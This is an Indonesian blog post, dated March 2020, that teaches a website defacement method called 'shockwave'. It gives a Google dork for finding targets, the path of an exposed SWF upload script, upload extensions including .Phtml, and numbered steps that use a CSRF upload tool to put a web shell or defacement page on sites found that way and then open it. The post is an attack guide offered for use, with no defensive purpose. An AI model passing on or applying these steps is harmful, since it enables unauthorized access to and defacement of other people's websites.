Tutorial Deface Methode Shockwave.
Senin, 09 Maret 2020
Hallo kali ini saya akan membagikan tutorial deface methode shockwave.
Dork:
inurl:/ajax_general/ ext:php
Exploit :
/admin/content/ajax_general/swf-uploader/upload-maps-file.php
CSRF : (Kill Me)
Upload Ekstensi : .html .jpg .Phtml .gif
Step By Step :
1. Dorking Dulu di google.
2. Pilih salah 1 target kalian lalu tambahkan exploit nya. /admin/content/ajax_general/swf-uploader/upload-maps-file.php
Contoh : https://razzerhacker.com/admin/content/ajax_general/swf-uploader/upload-maps-file.php
3. Ciri ciri web vuln ada bacaan ( Complete.***file/5e6640d7a005a/.***. ).
4. Lalu pergi ke csrf.
Untuk di bagian :
Url : Target kalian
POST FILE : Filedata
5. Lalu kunci target. Maka setelah kalian kunci target up shell kalian.
6. Nanti klo ada bacaan ( Complete.***file/5e6643b5b94bc/nama sc kalian.html***nama sc kalian.html )
7. Lalu kita panggil shell kita atau sc kita dengan templates/sc.html